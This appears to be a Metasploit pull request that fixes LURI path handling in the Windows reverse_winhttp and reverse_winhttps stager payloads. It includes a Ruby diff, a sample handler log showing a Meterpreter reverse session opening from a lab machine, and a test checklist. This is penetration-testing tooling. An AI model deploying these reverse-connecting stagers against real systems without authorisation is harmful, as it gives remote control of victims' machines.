### PR TITLE
Add LURI support to the reverse_http/s stagers

### DIFF
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -37,7 +37,7 @@ module Payload::Windows::ReverseWinHttp
 
     # Add extra options if we have enough space
     if self.available_space && required_space <= self.available_space
-      conf[:uri]              = generate_uri
+      conf[:uri]              = luri + generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]
       conf[:proxy_host]       = datastore['PayloadProxyHost']
@@ -49,7 +49,7 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_ie]         = datastore['PayloadProxyIE']
     else
       # Otherwise default to small URIs
-      conf[:uri]              = generate_small_uri
+      conf[:uri]              = luri + generate_small_uri
     end
 
     generate_reverse_winhttp(conf)
@@ -139,7 +139,7 @@ module Payload::Windows::ReverseWinHttp
     full_url << opts[:uri]
 
     encoded_full_url = asm_generate_wchar_array(full_url)
-    encoded_uri_index = full_url.rindex('/') * 2
+    encoded_uri_index = (full_url.length - opts[:uri].length) * 2
 
     if opts[:ssl] && opts[:verify_cert_hash]
       verify_ssl = true

--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -38,7 +38,7 @@ module Payload::Windows::ReverseWinHttp_x64
 
     # Add extra options if we have enough space
     if self.available_space && required_space <= self.available_space
-      conf[:uri]              = generate_uri
+      conf[:uri]              = luri + generate_uri
       conf[:exitfunk]         = datastore['EXITFUNC']
       conf[:verify_cert_hash] = opts[:verify_cert_hash]
       conf[:proxy_host]       = datastore['PayloadProxyHost']
@@ -50,7 +50,7 @@ module Payload::Windows::ReverseWinHttp_x64
       conf[:proxy_ie]         = datastore['PayloadProxyIE']
     else
       # Otherwise default to small URIs
-      conf[:uri]              = generate_small_uri
+      conf[:uri]              = luri + generate_small_uri
     end
 
     generate_reverse_winhttp(conf)
@@ -141,7 +141,7 @@ module Payload::Windows::ReverseWinHttp_x64
     full_url << opts[:uri]
 
     encoded_full_url = asm_generate_wchar_array(full_url)
-    encoded_uri_index = full_url.rindex('/') * 2
+    encoded_uri_index = (full_url.length - opts[:uri].length) * 2
 
     if opts[:ssl] && opts[:verify_cert_hash]
       verify_ssl = true


### PR DESCRIPTION
As mentioned in #7525, the `reverse_winhttp` and `reverse_winhttps` stagers for both x64 and x86 did not support the new `LURI` option correctly. As a result, the `LURI` was ignored, and no sessions were established. This results in sadness.

This PR fixes this issue by:

* Adding the `luri` to the `uri` option in the stagers.
* Making sure the index to the URI is calculated correctly.

## Sample Run
```
[*] [2016.11.03-14:47:48] Started HTTP reverse handler on http://172.16.255.1:8443/winhttp
[*] [2016.11.03-14:47:48] Starting the payload handler...
msf exploit(handler) > [*] [2016.11.03-14:50:20] http://172.16.255.1:8443 handling request from 172.16.255.131; (UUID: zxrbsaj5) Staging Native payload...
[*] Meterpreter session 1 opened (172.16.255.1:8443 -> 172.16.255.131:49948) at 2016-11-03 14:50:20 +1000

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  172.16.255.1:8443 -> 172.16.255.131:49948 (172.16.255.131)
```

## Verification

### x86
#### HTTP
##### No LURI
- [x] Create a `windows/meterpreter/reverse_winhttp` payload _without_ an `LURI`.
- [x] Create a `windows/meterpreter/reverse_winhttp` listener _without_ an `LURI`.
- [x] Run the payload, make sure that the session is established and works
##### With LURI
- [x] Create a `windows/meterpreter/reverse_winhttp` payload with `LURI` set to `test`.
- [x] Create a `windows/meterpreter/reverse_winhttp` listener with `LURI` set to `test`.
- [x] Run the payload, make sure that the session is established and works
#### HTTPS
##### No LURI
- [x] Create a `windows/meterpreter/reverse_winhttps` payload _without_ an `LURI`.
- [x] Create a `windows/meterpreter/reverse_winhttps` listener _without_ an `LURI`.
- [x] Run the payload, make sure that the session is established and works
##### With LURI
- [x] Create a `windows/meterpreter/reverse_winhttps` payload with `LURI` set to `test`.
- [x] Create a `windows/meterpreter/reverse_winhttps` listener with `LURI` set to `test`.
- [x] Run the payload, make sure that the session is established and works

### x64
#### HTTP
##### No LURI
- [x] Create a `windows/x64/meterpreter/reverse_winhttp` payload _without_ an `LURI`.
- [x] Create a `windows/x64/meterpreter/reverse_winhttp` listener _without_ an `LURI`.
- [x] Run the payload, make sure that the session is established and works
##### With LURI
- [x] Create a `windows/x64/meterpreter/reverse_winhttp` payload with `LURI` set to `test`.
- [x] Create a `windows/x64/meterpreter/reverse_winhttp` listener with `LURI` set to `test`.
- [x] Run the payload, make sure that the session is established and works
#### HTTPS
##### No LURI
- [x] Create a `windows/x64/meterpreter/reverse_winhttps` payload _without_ an `LURI`.
- [x] Create a `windows/x64/meterpreter/reverse_winhttps` listener _without_ an `LURI`.
- [x] Run the payload, make sure that the session is established and works
##### With LURI
- [x] Create a `windows/x64/meterpreter/reverse_winhttps` payload with `LURI` set to `test`.
- [x] Create a `windows/x64/meterpreter/reverse_winhttps` listener with `LURI` set to `test`.
- [x] Run the payload, make sure that the session is established and works

This fixes #7525.